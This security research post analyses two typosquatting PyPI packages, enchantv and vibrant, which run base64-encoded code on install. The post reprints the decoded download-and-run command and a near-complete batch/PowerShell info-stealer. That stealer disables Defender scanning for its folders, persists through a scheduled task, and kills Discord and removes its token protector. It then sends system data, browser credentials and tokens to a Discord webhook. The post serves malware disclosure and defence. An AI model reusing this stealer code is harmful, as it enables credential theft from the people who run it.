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Two Typosquatting Python Packages Exploit Discord CDN to Deploy Malicious Payloads for Data Theft and System Manipulation

Socket discovered two malicious Python packages, enchantv and vibrant, imitating popular packages and targeting victims via a base64 encoded payload in their setup files.

Two Typosquatting Python Packages Exploit Discord CDN to Deploy Malicious Payloads for Data Theft and System Manipulation

Socket Research Team

Sarah Gooding

February 16, 2024

On December 25th, the Socket AI scanner flagged two Python packages, enchantv and vibrant, as potentially malicious. Subsequent analysis by the Socket Research Team confirmed that the packages were deploying malware via a base64 encoded payload in their setup files and using a Discord CDN for batch script execution.

The two packages, which perform malicious actions, including data theft and system manipulation, included similar code and Indicators of Compromise (IOC’s). This suggests that the publisher could be the same person or same group of people.

Before removal from the PyPI registry, the two packages racked up 279 and 7,697 downloads, respectively. The enchantv package may have targeted victims who searched for ‘pyenchant’, a popular package with +66,000 weekly downloads and total downloads of approximated +20 Million.

The vibrant package may have been created to impersonate the vibrant-python package, which produces color palettes from images and receives approximately 500 downloads per month.

In the following, we take a closer look at the packages in question, starting with their package information files:

  • enchantv 1.0.0
  • vibrant 1.0.0

As per the descriptions above, the contact email listed is the same: The domain name ‘’ is a popular hacker’s forum where stolen data is traded.

The package name suggests that it targets typosquatting victims who searched for ‘pyenchant’, although the package author did little to make the malicious package's details more convincing beyond simply laying the typosquatting trap.

Taking note of all the artifacts, the Socket Research Team decided to undertake a deep dive analysis.

The ‘’ contains a base64 encoded payload. Upon decoding the payload, it was observed that it downloads a batch script from a Discord CDN and executes it silently.

import setuptools
from setuptools.command.install import install
from setuptools.command.develop import develop
import base64
import os

def b64d(base64_code):
    base64_bytes = base64_code.encode('ascii')
    code_bytes = base64.b64decode(base64_bytes)
    code = code_bytes.decode('ascii')
    return code

def notmalfunc():

class AfterDevelop(develop):
    def run(self):

class AfterInstall(install):
    def run(self):

    name = "enchantV",
    version = "1.0.0",
    author = "nulled",
    author_email = "",
    description = "A test package we are working on, please stay tuned",
    long_description = "nothing to see here yet!",
    long_description_content_type = "text/markdown",
    url = "",
    project_urls = {
        "Bug Tracker": "",
    classifiers = [
        "Programming Language :: Python :: 3",
        "License :: OSI Approved :: MIT License",
        "Operating System :: OS Independent",
    package_dir = {"": "src"},
    packages = setuptools.find_packages(where="src"),
    python_requires = ">=3.6",
        'develop': AfterDevelop,
        'install': AfterInstall,

Threat Summary#

To understand the behavior of the malicious actions, let's take a closer look at the base64encoded strings in the file:

def notmalfunc():

After decoding, we found the following curl command that further downloads a batch file ‘strings.bat’ and saves it in a temp directory.

curl -s -o %temp%\strings.bat && start /min cmd /c %temp%\strings.bat

From the above we can understand threat It is saving a strings.bat in the temp directory of the user's operating system. Once the bat file is downloaded, it has two parts with huge white space in between such that a reviewer may oversee the malicious part of the code.

Analyzing the Batch File#

For the subsequent analysis, we break down the code into two parts.

Part 1 of the Code:

This batch script checks if it's running with administrative privileges. If not, it relaunches itself with elevated permissions using PowerShell. This ensures that it can perform administrative tasks securely.

@echo off
if not "%1"=="am_admin" (
    powershell -Command "Start-Process -Verb RunAs -FilePath '%0' -ArgumentList 'am_admin'"
    exit /b

Part 2 of the Code:

  1. This script creates a PowerShell script (powershell.ps1) with several functions and tasks. Here's a summary of what it does:
  2. Defines a function CHECK_IF_ADMIN to check if the script is running with administrative privileges.
  3. Defines a function TASKS to perform various tasks, including:
    1. Checking for the existence of a directory ($env:APPDATA\KDOT) and adding exclusion paths for Windows Defender if it doesn't exist.
    2. Checking if a scheduled task named "KDOT" exists; if not, creating a new scheduled task to run a PowerShell script (KDOT.ps1) at startup.
    3. Performing additional actions (Grub) such as retrieving system information, grabbing the IP address, creating Discord webhook messages, and more.
  4. Defines a function Grub to perform additional actions, including gathering system information, creating Discord webhook messages, and downloading and executing an executable (main.exe) from a GitHub release.
  5. Checks if the script is running with administrative privileges. If not, it attempts to relaunch itself with elevated permissions.
  6. Sets PowerShell execution policy to Unrestricted for the current user.
  7. Executes the PowerShell script (powershell.ps1) silently and deletes it afterward.
  8. Exits the batch script.
  9. Overall, the script is performing malicious actions such as checking for administrative privileges, executing system commands, gathering information, and sending data to a Discord webhook. It then attempts to elevate its privileges if necessary and executes the PowerShell script silently.
echo function CHECK_IF_ADMIN { > powershell.ps1
echo     $test = ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltinRole]::Administrator); echo $test >> powershell.ps1
echo } >> powershell.ps1
echo function TASKS { >> powershell.ps1
echo     $test_KDOT = Test-Path -Path "$env:APPDATA\KDOT" >> powershell.ps1
echo     if ($test_KDOT -eq $false) { >> powershell.ps1
echo         try { >> powershell.ps1
echo             Add-MpPreference -ExclusionPath "$env:LOCALAPPDATA\Temp" >> powershell.ps1
echo             Add-MpPreference -ExclusionPath "$env:APPDATA\KDOT" >> powershell.ps1
echo         } catch { >> powershell.ps1
echo             Write-Host "Failed to add exclusions" >> powershell.ps1
echo         } >> powershell.ps1
echo         New-Item -ItemType Directory -Path "$env:APPDATA\KDOT" >> powershell.ps1
echo         $origin = $PSCommandPath >> powershell.ps1
echo         Copy-Item -Path $origin -Destination "$env:APPDATA\KDOT\KDOT.ps1" >> powershell.ps1
echo     } >> powershell.ps1
echo     $test = Get-ScheduledTask ^| Select-Object -ExpandProperty TaskName >> powershell.ps1
echo     if ($test -contains "KDOT") { >> powershell.ps1
echo         Write-Host "KDOT already exists" >> powershell.ps1
echo     } else { >> powershell.ps1
echo         $schedule = New-ScheduledTaskTrigger -AtStartup >> powershell.ps1
echo         $action = New-ScheduledTaskAction -Execute "powershell.exe" -Argument "-ExecutionPolicy Bypass -WindowStyle hidden -File $env:APPDATA\KDOT\KDOT.ps1" >> powershell.ps1
echo         Register-ScheduledTask -TaskName "KDOT" -Trigger $schedule -Action $action -RunLevel Highest -Force >> powershell.ps1
echo     } >> powershell.ps1
echo     Grub >> powershell.ps1
echo } >> powershell.ps1
echo function Grub { >> powershell.ps1
echo     $webhook = "" >> powershell.ps1
echo     $ip = Invoke-WebRequest -Uri "" -UseBasicParsing >> powershell.ps1
echo     $ip = $ip.Content >> powershell.ps1
echo     $ip ^> $env:LOCALAPPDATA\Temp\ip.txt >> powershell.ps1
echo     $system_info = systeminfo.exe ^> $env:LOCALAPPDATA\Temp\system_info.txt >> powershell.ps1
echo     $uuid = Get-WmiObject -Class Win32_ComputerSystemProduct ^| Select-Object -ExpandProperty UUID  >> powershell.ps1
echo     $uuid ^> $env:LOCALAPPDATA\Temp\uuid.txt >> powershell.ps1
echo     $mac = Get-WmiObject -Class Win32_NetworkAdapterConfiguration ^| Select-Object -ExpandProperty MACAddress >> powershell.ps1
echo     $mac ^> $env:LOCALAPPDATA\Temp\mac.txt >> powershell.ps1
echo     $username = $env:USERNAME >> powershell.ps1
echo     $hostname = $env:COMPUTERNAME >> powershell.ps1
echo     $netstat = netstat -ano ^> $env:LOCALAPPDATA\Temp\netstat.txt >> powershell.ps1
echo     $embed_and_body = @{ >> powershell.ps1
echo         "username" = "KDOT" >> powershell.ps1
echo         "content" = "@everyone" >> powershell.ps1
echo         "title" = "KDOT" >> powershell.ps1
echo         "description" = "KDOT" >> powershell.ps1
echo         "color" = "16711680" >> powershell.ps1
echo         "avatar_url" = "" >> powershell.ps1
echo         "url" = "" >> powershell.ps1
echo         "embeds" = @( >> powershell.ps1
echo             @{ >> powershell.ps1
echo                 "title" = "SOMALI GRABBER" >> powershell.ps1
echo                 "url" = "" >> powershell.ps1
echo                 "description" = "New person grabbed using KDOT's TOKEN GRABBER" >> powershell.ps1
echo                 "color" = "16711680" >> powershell.ps1
echo                 "footer" = @{ >> powershell.ps1
echo                     "text" = "Made by KDOT and GODFATHER" >> powershell.ps1
echo                 } >> powershell.ps1
echo                 "thumbnail" = @{ >> powershell.ps1
echo                     "url" = "" >> powershell.ps1
echo                 } >> powershell.ps1
echo                 "fields" = @( >> powershell.ps1
echo                     @{ >> powershell.ps1
echo                         "name" = "IP" >> powershell.ps1
echo                         "value" = "``````$ip``````" >> powershell.ps1
echo                     }, >> powershell.ps1
echo                     @{ >> powershell.ps1
echo                         "name" = "Username" >> powershell.ps1
echo                         "value" = "``````$username``````" >> powershell.ps1
echo                     }, >> powershell.ps1
echo                     @{ >> powershell.ps1
echo                         "name" = "Hostname" >> powershell.ps1
echo                         "value" = "``````$hostname``````" >> powershell.ps1
echo                     }, >> powershell.ps1
echo                     @{ >> powershell.ps1
echo                         "name" = "UUID" >> powershell.ps1
echo                         "value" = "``````$uuid``````" >> powershell.ps1
echo                     }, >> powershell.ps1
echo                     @{ >> powershell.ps1
echo                         "name" = "MAC" >> powershell.ps1
echo                         "value" = "``````$mac``````" >> powershell.ps1
echo                     } >> powershell.ps1
echo                 ) >> powershell.ps1
echo             } >> powershell.ps1
echo         ) >> powershell.ps1
echo     } >> powershell.ps1
echo     $payload = $embed_and_body ^| ConvertTo-Json -Depth 10 >> powershell.ps1
echo     Invoke-WebRequest -Uri $webhook -Method POST -Body $payload -ContentType "application/json" ^| Out-Null >> powershell.ps1
echo     Set-Location $env:LOCALAPPDATA\Temp >> powershell.ps1
echo     taskkill.exe /f /im "Discord.exe" ^| Out-Null >> powershell.ps1
echo     taskkill.exe /f /im "DiscordCanary.exe" ^| Out-Null >> powershell.ps1
echo     taskkill.exe /f /im "DiscordPTB.exe" ^| Out-Null >> powershell.ps1
echo     taskkill.exe /f /im "DiscordTokenProtector.exe" ^| Out-Null >> powershell.ps1
echo     $token_prot = Test-Path "$env:APPDATA\DiscordTokenProtector\DiscordTokenProtector.exe" >> powershell.ps1
echo     if ($token_prot -eq $true) { >> powershell.ps1
echo         Remove-Item "$env:APPDATA\DiscordTokenProtector\DiscordTokenProtector.exe" -Force >> powershell.ps1
echo     } >> powershell.ps1
echo     $secure_dat = Test-Path "$env:APPDATA\DiscordTokenProtector\secure.dat" >> powershell.ps1
echo     if ($secure_dat -eq $true) { >> powershell.ps1
echo         Remove-Item "$env:APPDATA\DiscordTokenProtector\secure.dat" -Force >> powershell.ps1
echo     } >> powershell.ps1
echo     $TEMP_KOT = Test-Path "$env:LOCALAPPDATA\Temp\KDOT" >> powershell.ps1
echo     if ($TEMP_KOT -eq $false) { >> powershell.ps1
echo         New-Item "$env:LOCALAPPDATA\Temp\KDOT" -Type Directory >> powershell.ps1
echo     } >> powershell.ps1
echo     $gotta_make_sure = "penis"; Set-Content -Path "$env:LOCALAPPDATA\Temp\KDOT\bruh.txt" -Value "$gotta_make_sure" >> powershell.ps1
echo     Invoke-WebRequest -Uri "" -OutFile "main.exe" -UseBasicParsing >> powershell.ps1
echo     $proc = Start-Process $env:LOCALAPPDATA\Temp\main.exe -ArgumentList "$webhook" -NoNewWindow -PassThru >> powershell.ps1
echo     $proc.WaitForExit() >> powershell.ps1
echo     $lol = "$env:LOCALAPPDATA\Temp" >> powershell.ps1
echo     Move-Item -Path "$lol\ip.txt" -Destination "$lol\KDOT\ip.txt" -ErrorAction SilentlyContinue >> powershell.ps1
echo     Move-Item -Path "$lol\netstat.txt" -Destination "$lol\KDOT\netstat.txt" -ErrorAction SilentlyContinue >> powershell.ps1
echo     Move-Item -Path "$lol\system_info.txt" -Destination "$lol\KDOT\system_info.txt" -ErrorAction SilentlyContinue >> powershell.ps1
echo     Move-Item -Path "$lol\uuid.txt" -Destination "$lol\KDOT\uuid.txt" -ErrorAction SilentlyContinue >> powershell.ps1
echo     Move-Item -Path "$lol\mac.txt" -Destination "$lol\KDOT\mac.txt" -ErrorAction SilentlyContinue >> powershell.ps1
echo     Move-Item -Path "$lol\browser-cookies.txt" -Destination "$lol\KDOT\browser-cookies.txt" -ErrorAction SilentlyContinue >> powershell.ps1
echo     Move-Item -Path "$lol\browser-history.txt" -Destination "$lol\KDOT\browser-history.txt" -ErrorAction SilentlyContinue >> powershell.ps1
echo     Move-Item -Path "$lol\browser-passwords.txt" -Destination "$lol\KDOT\browser-passwords.txt" -ErrorAction SilentlyContinue >> powershell.ps1
echo     Move-Item -Path "$lol\desktop-screenshot.png" -Destination "$lol\KDOT\desktop-screenshot.png" -ErrorAction SilentlyContinue >> powershell.ps1
echo     Move-Item -Path "$lol\tokens.txt" -Destination "$lol\KDOT\tokens.txt" -ErrorAction SilentlyContinue >> powershell.ps1
echo     Compress-Archive -Path "$lol\KDOT" -DestinationPath "$lol\" -Force >> powershell.ps1
echo     #Invoke-WebRequest -Uri "$webhook" -Method Post -InFile "$lol\" -ContentType "multipart/form-data" >> powershell.ps1
echo     #curl.exe -X POST -H "Content-Type: multipart/form-data" -F "file=@$lol\" $webhook >> powershell.ps1
echo     curl.exe -X POST -F 'payload_json={\"username\": \"KING KDOT\", \"content\": \"\", \"avatar_url\": \"\"}' -F "file=@$lol\" $webhook >> powershell.ps1
echo     Remove-Item "$lol\" >> powershell.ps1
echo     Remove-Item "$lol\KDOT" -Recurse >> powershell.ps1
echo     Remove-Item "$lol\main.exe" >> powershell.ps1
echo } >> powershell.ps1
echo if (CHECK_IF_ADMIN -eq $true) { >> powershell.ps1
echo     TASKS >> powershell.ps1
echo     #pause >> powershell.ps1
echo } else { >> powershell.ps1
echo     Write-Host ("Please run as admin!") -ForegroundColor Red >> powershell.ps1
echo     $origin = $MyInvocation.MyCommand.Path >> powershell.ps1
echo     Start-Process powershell -ArgumentList "-noprofile -file $origin" -verb RunAs >> powershell.ps1
echo } >> powershell.ps1
powershell Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Unrestricted -Force
powershell.exe -executionpolicy bypass -windowstyle hidden -noninteractive -nologo -file powershell.ps1
del powershell.ps1 /f /q
timeout 3 > nul

Threat Impact#

The executable hosted on GitHub is from a repository called PowerShell Token Grabber, which explicitly states that the tool is made for data exfiltration. The information collected is sent using Discord webhooks. This project was created to steal the following types of sensitive data:

  • Wifi passwords
  • Files: 2fa, backupcodes, seedphrases, passwords, etc.
  • Webcam and Desktop Screenshots
  • Session Stealers for messaging, gaming, and VPN clients
  • Crypto wallets
  • Browser passwords, cookies, and history
  • Discord tokens
  • And more ...

Indicators of Compromise:#



Credits to the Socket Research Team: Dhanesh Dodia, Sambarathi Sai, Viren Saroha

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